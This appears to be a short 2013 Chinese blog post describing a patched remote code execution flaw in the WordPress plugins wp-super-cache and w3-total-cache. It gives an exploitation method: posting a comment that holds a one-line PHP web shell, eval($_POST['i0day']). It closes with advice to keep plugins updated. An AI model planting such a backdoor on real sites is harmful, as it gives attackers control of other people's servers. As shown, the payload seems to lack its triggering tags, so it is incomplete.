wordpress缓存插件可执行远程代码漏洞

2013-5-3    分类: WordPress插件,前端资源,网络安全

存在漏洞的插件名称及版本:
1.wp-super-cache 1.3以下版本
2.w3-total-cache 0.9.2.9以下版本
这两个插件的漏洞官方已经修复.....
漏洞原理是缓存插件在生成一个页面的新缓存时,解析了PHP代码片段。我们将PHP代码写入到目标的文章评论中,当缓存更新后,就可实现插入后门等行为。
两种插件都已测试,都能成功....
利用方法:
在评论的地方插入如下代码:


/*base64加密的诸如*/eval($_POST["i0day"]);/*一句话后门可在这里被执行*/
/*可以利用fopen生成一句话....
测试phpinfo截图:
201342914511929946
wordpress程序本身的安全性很高,但是wordpress插件方便完善我们网站的同时也给我们网站带来了隐患,只要做到及时更新插件即可尽量避免受到黑客攻击。